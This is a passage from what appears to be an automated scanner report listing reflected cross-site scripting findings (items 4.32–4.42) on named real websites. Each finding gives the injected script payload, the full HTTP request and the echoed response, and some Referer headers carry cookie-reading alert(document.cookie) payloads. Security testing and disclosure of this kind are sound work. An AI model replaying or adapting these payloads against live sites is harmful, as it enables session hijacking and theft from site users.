document.getElementsByTagName('head')[0].appendChild(dgt_script);

4.32. http://ds.addthis.com/red/psi/sites/www.staysafeonline.org/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.staysafeonline.org/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ad9dc<script>alert(1)</script>c211f103512 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.staysafeonline.org/p.json?callback=_ate.ad.hprad9dc<script>alert(1)</script>c211f103512&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.staysafeonline.org%2Fcontact&ref=http%3A%2F%2Fwww.staysafeonline.org%2F&xls06r HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=1302905826.1FE|1302905826.60|1302905826.66; dt=X; psc=4; uid=4d97b40ad252fd37

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 451
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 17 Apr 2011 12:53:49 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 17 May 2011 12:53:49 GMT; Path=/
Set-Cookie: di=%7B%7D..1303044829.1FE|1303044829.60|1303044829.66; Domain=.addthis.com; Expires=Tue, 16-Apr-2013 12:53:48 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 17 Apr 2011 12:53:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 17 Apr 2011 12:53:49 GMT
Connection: close

_ate.ad.hprad9dc<script>alert(1)</script>c211f103512({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4d97b40ad252fd37","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d97b40ad252fd37&curl=http%3a%2f%2fwww.staysaf
...[SNIP]...

4.33. http://ds.addthis.com/red/psi/sites/www.webroot.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.webroot.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 41b69<script>alert(1)</script>b9cd18d7e21 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.webroot.com/p.json?callback=_ate.ad.hpr41b69<script>alert(1)</script>b9cd18d7e21&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.webroot.com%2FEn_US%2Fbusiness-antispyware-ce.html&ref=http%3A%2F%2Fburp%2Fshow%2F26&1vvglw8 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%7D..1303044828.1FE|1303044828.60|1303044865.66; dt=X; psc=4; uid=4d97b40ad252fd37

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 17 Apr 2011 13:20:04 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 17 May 2011 13:20:04 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 17 Apr 2011 13:20:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 17 Apr 2011 13:20:04 GMT
Connection: close

_ate.ad.hpr41b69<script>alert(1)</script>b9cd18d7e21({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

4.34. http://event.adxpose.com/event.flow [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 9776c<script>alert(1)</script>af634ea0b3b was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.martindale.com%2Fall%2Fc-england%2Fall-lawyers-3.htm%3Fc%3DN&uid=ZC45X9Axu6NOUFfX_3216119776c<script>alert(1)</script>af634ea0b3b&xy=0%2C0&wh=160%2C600&vchannel=76289&cid=151354&iad=1302961744905-1937990565784275&cookieenabled=1&screenwh=1920%2C1200&adwh=160%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper;sz=160x600;ord=3737712935544550400?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=f316e322-42df-4ab5-ad2c-53028d5d34aa

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=ABA01A6D8C5302184EC9B5B48A58FCC8; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 145
Date: Sat, 16 Apr 2011 13:49:37 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_3216119776c<script>alert(1)</script>af634ea0b3b");

4.35. http://feeds.feedburner.com/~s/hadash-hot [i parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.feedburner.com
Path:   /~s/hadash-hot

Issue detail

The value of the i request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba601"%3balert(1)//a740d68a772 was submitted in the i parameter. This input was echoed as ba601";alert(1)//a740d68a772 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /~s/hadash-hot?i=http://www.hadash-hot.co.il/login.php?return=/submit.php?69123ba601"%3balert(1)//a740d68a772 HTTP/1.1
Host: feeds.feedburner.com
Proxy-Connection: keep-alive
Referer: http://www.hadash-hot.co.il/login.php?return=/submit.php?69123%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Efab6770260=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=UTF-8
Date: Sun, 17 Apr 2011 14:35:06 GMT
Expires: Sun, 17 Apr 2011 14:35:06 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 743

var fStartPost=1;if(window.feedburner_currPost!=null){window.feedburner_currPost++}else{window.feedburner_currPost=1}if(document.body.getAttribute("fStartPost")){fs=parseInt(document.body.getAttribute
...[SNIP]...
ner_startPostOverride=fStartPost}if(window.feedburner_currPost==fStartPost){feedSrc='http://feeds.feedburner.com/~s/hadash-hot?i='+escape("http://www.hadash-hot.co.il/login.php?return=/submit.php?69123ba601";alert(1)//a740d68a772")+'&showad=true';document.write('<script src="'+feedSrc+'" type="text/javascript">
...[SNIP]...

4.36. http://googlev8.dealer.com/smgmap.htm [locale parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://googlev8.dealer.com
Path:   /smgmap.htm

Issue detail

The value of the locale request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 230ed"><script>alert(1)</script>8066f9184f8 was submitted in the locale parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smgmap.htm?accountId=automastermercedesbenz&locale=en_US230ed"><script>alert(1)</script>8066f9184f8 HTTP/1.1
Host: googlev8.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/dealership/about.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:16:00 GMT
Connection: close
Set-Cookie: ssoid=5f5015bb0a0a0003004764a11aea3255;path=/;domain=.dealer.com
Set-Cookie: ddcpoolid=CmsPoolGoogleV8;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 2962

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms19.dealer.ddc p7072 -->

   <title>Google Maps</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859
...[SNIP]...
<body class="honda enUS230ed"><script>alert(1)</script>8066f9184f8">
...[SNIP]...

4.37. http://googlev8.dealer.com/smgmap.htm [locale parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://googlev8.dealer.com
Path:   /smgmap.htm

Issue detail

The value of the locale request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b9af'%3balert(1)//722916ad0cd was submitted in the locale parameter. This input was echoed as 1b9af';alert(1)//722916ad0cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smgmap.htm?accountId=automastermercedesbenz&locale=en_US1b9af'%3balert(1)//722916ad0cd HTTP/1.1
Host: googlev8.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/dealership/about.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:16:00 GMT
Connection: close
Set-Cookie: ssoid=5f4fdeb00a0a00ed0114d7392b1ea276;path=/;domain=.dealer.com
Set-Cookie: ddcpoolid=CmsPoolGoogleV8;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 2932

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms18.dealer.ddc p7072 -->

   <title>Google Maps</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859
...[SNIP]...
<![CDATA[*/
   window.DDC = window.DDC || {};
   DDC.locale = DDC.locale || 'en_US1b9af';alert(1)//722916ad0cd';
/*]]>
...[SNIP]...

4.38. http://home.mcafee.com/root/campaign.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://home.mcafee.com
Path:   /root/campaign.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70676"%3balert(1)//845bc386871 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70676";alert(1)//845bc386871 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /root/campaign.aspx?cid=83831&70676"%3balert(1)//845bc386871=1 HTTP/1.1
Host: home.mcafee.com
Proxy-Connection: keep-alive
Referer: http://home.mcafee.com/downloads/free-virus-scan
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionInfo=AffiliateId=0; lBounceURL=http://home.mcafee.com/downloads/free-virus-scan; currentURL=http%3A//home.mcafee.com/downloads/free-virus-scan; isvt_visitor=yNo98QoBC2cAABJDQT4AAAAAAB1JCVeen0VKRW; WT_FPC=id=20dc5aca13b81baa15d1303034109486:lv=1303034109486:ss=1303034109486; session%5Fdata=%3cSessionData%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e0%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e0%3c%2fwt_destination_cid%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; SessionInfo=AffiliateId=0; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Locale=EN-US; HPrst=gu=122d9a9e-74f4-4d0e-85cf-3ecd0f120b8e&loc=EN-US; AffID=0-0; Currency=56; HRntm=aff=0-0&cur=56&lbu=http%3a%2f%2fhome.mcafee.com%2fdownloads%2ffree-virus-scan&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; s_cc=true; s_vi=[CS]v1|26D5719A051D00E9-600001368029DFAB[CE]; IS3_History=1302573891-1-74_3--1__3_; IS3_GSV=DPL-2_TES-1303044907_PCT-1303044907_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; FSRCookie=isAlive=1||ForeseeLoyalty=1; foresee.alive=1303045172416; s_nr=1303045173262-New; s_ev8=%5B%5B%27mcafee%27%2C%271303045173265%27%5D%5D; s_sq=mcafeecomglobal%3D%2526pid%253Dconsumer%25253Aen-us%25253Adirect-0-mcafee%25253Afree_services%25253Afreescan_scan_initiated%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253Alocation.href%25253D%252522http%25253A//home.mcafee.com/root/campaign.aspx%25253Fcid%25253D83831%2526oidt%253D2%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:55 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Wed, 17-Apr-2041 12:59:55 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: CampaignId=83831; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=83831; path=/
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e0%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e0%3c%2fwt_destination_cid%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:55 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=122d9a9e-74f4-4d0e-85cf-3ecd0f120b8e&loc=EN-US; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:55 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=83831&lbu=http%3a%2f%2fhome.mcafee.com%2fdownloads%2ffree-virus-scan&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
X-Powered-By: ASP.NET
MS: SJV7
X-UA-Compatible: IE=8
Date: Sun, 17 Apr 2011 12:59:54 GMT
Content-Length: 1254


<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>

</title></head>
<body>
<form name="form1" method="post" action="campaign.aspx?cid=83831&amp;70676%22%3balert(1)%2f%2f8
...[SNIP]...
<script type="text/javascript">
window.location.href = "http://liteapps.mcafee.com/apps/mss/download.asp?affid=0&large=1&cid=83831&70676";alert(1)//845bc386871=1";
</script>
...[SNIP]...

4.39. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload b6e35<script>alert(1)</script>73b5bcd535 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=I09839b6e35<script>alert(1)</script>73b5bcd535 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/za/additem?a5f9f=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc816d2&20&10385,10387,10389,10395,10397,10402,10408,10406,10410,10412,10413,10419,10033,10336,10363,10424,10426,50033,50052,50000&4da2566e&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc8192a&0&&4da27787&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dcaca1f&0&&4da49860&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dcacfbc&0&&4da5225d&00f8712b16a2747053422af6cef97d9a; udm_0=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; NETSEGS_K08784=379226250c6302c7&K08784&0&4dce87da&0&&4da90335&00f8712b16a2747053422af6cef97d9a; rsiPus_0="MLtHrVEucB5zJoH0UljaSkoWWEQP/HsN06aUy4hJ4iAxx4kUbDRiYNBumGFB/7hKFwUF5zkuxs3CTF/hxUboLnFkdRFbpB82GEClPl/i5LndwMyIvIcjCjo7BukEz0m4KS8PDEhKXh6N5GwMhcufRERxUalBRHypYmdvWKAhKNafO2dPtsGuKb5neHsE6FwjUIRA83vfNnPyB8p5PQ1zYBnhNMA6wEUVThR2g7B12YjsMRCFaKHz0TGKswVgaiTCqLjgfT0S+GuZLiD52/VC0Nv2ONiR1XNhgTjk6Q0+hk9MQpEV63vVrfOvxiDyd6HBsoG8G+z06EiVnR8D/xRKZzFJC3E63+8VHkDGmCkdgwhnroue3nKVHQHh"; rsi_us_1000000="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"; rsi_segs_1000000=pUPFJU2Br3IM1p94u+w/JTlpea6iE6ea4dqUtRDorAMqsncbnFjc6nNskvAlloepKxEYDeToWSqCVsVxZnlRuDx7h5Ea24oGNFbXEHQrasy4JCDlXf200Z7tQxzqzT7PDo/eR1qUcqeI+3EDwcun/AAYgjloHX61Y4c7Hvi4zjIKdOGRSqIRtGLjBVER2sD3CjtZ8En8TPq0EE/msi6btEvQhcMwR74VMe4oTmE8951fn5uhhxlREM4fiwBI+G9ouXWU9gKJRtfR4qM2z1jQZGgqBFTaKHYIvod7xmJw+xLYp49u/i1ph8m/SFWsPjxgOlFnng8XR7fuEOOne4rwDVuRJBHPrzAmBFvaDz4N9iTrTjhuRvF5MBGbAMZ7OIST0jt76s/RSCeW; rtc_vEGl=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 17 Apr 2011 14:24:11 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 18 Apr 2011 14:24:11 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:24:10 GMT
Content-Length: 127

/*
* JavaScript include error:
* The customer code "I09839B6E35<SCRIPT>ALERT(1)</SCRIPT>73B5BCD535" was not recognized.
*/

4.40. http://law.alltop.com/css/din-bold.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://law.alltop.com
Path:   /css/din-bold.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d0c7"><script>alert(1)</script>4acc94967d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css4d0c7"><script>alert(1)</script>4acc94967d7/din-bold.swf HTTP/1.1
Host: law.alltop.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; alltop_v=eb8e1238e83a994c827243f20aced46d; alltop_r=2; sifrFetch=true; __qca=P0-1457044879-1302961854448; __utmz=160012002.1302961854.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=160012002.1443153480.1302961854.1302961854.1302961854.1; __utmc=160012002; __utmb=160012002.2.9.1302961854546; __qseg=Q_D|Q_T|Q_2891|Q_2360|Q_2349|Q_2346|Q_2340|Q_1659|Q_1286|Q_1155|Q_1154|Q_1153|Q_1151|Q_1150|Q_1149|Q_1148|Q_1147|Q_1145|Q_983|Q_982

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 13:51:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Fri, 16-Apr-2010 13:51:36 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; path=/; domain=.alltop.com
Expires: Sat, 16 Apr 2011 14:51:36 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Mon, 15 Nov 2010 16:29:58 GMT
Set-Cookie: alltop_r=2; expires=Fri, 15-Jul-2011 13:51:36 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 930373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/css4d0c7"><script>alert(1)</script>4acc94967d7/din-bold.swf" method="post" accept-charset="utf-8">
...[SNIP]...

4.41. http://law.alltop.com/css/din-bold.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://law.alltop.com
Path:   /css/din-bold.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91506"><script>alert(1)</script>bc3da8f28a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/din-bold.swf91506"><script>alert(1)</script>bc3da8f28a0 HTTP/1.1
Host: law.alltop.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; alltop_v=eb8e1238e83a994c827243f20aced46d; alltop_r=2; sifrFetch=true; __qca=P0-1457044879-1302961854448; __utmz=160012002.1302961854.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=160012002.1443153480.1302961854.1302961854.1302961854.1; __utmc=160012002; __utmb=160012002.2.9.1302961854546; __qseg=Q_D|Q_T|Q_2891|Q_2360|Q_2349|Q_2346|Q_2340|Q_1659|Q_1286|Q_1155|Q_1154|Q_1153|Q_1151|Q_1150|Q_1149|Q_1148|Q_1147|Q_1145|Q_983|Q_982

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 13:51:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Fri, 16-Apr-2010 13:51:50 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; path=/; domain=.alltop.com
Expires: Sat, 16 Apr 2011 14:51:50 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Mon, 15 Nov 2010 16:29:58 GMT
Set-Cookie: alltop_r=2; expires=Fri, 15-Jul-2011 13:51:50 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 930373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/css/din-bold.swf91506"><script>alert(1)</script>bc3da8f28a0" method="post" accept-charset="utf-8">
...[SNIP]...

4.42. http://law.alltop.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://law.alltop.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32383"><script>alert(1)</script>e537a41bbed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico32383"><script>alert(1)</script>e537a41bbed HTTP/1.1
Host: law.alltop.com
Proxy-Connection: keep-alive
Accept: */*
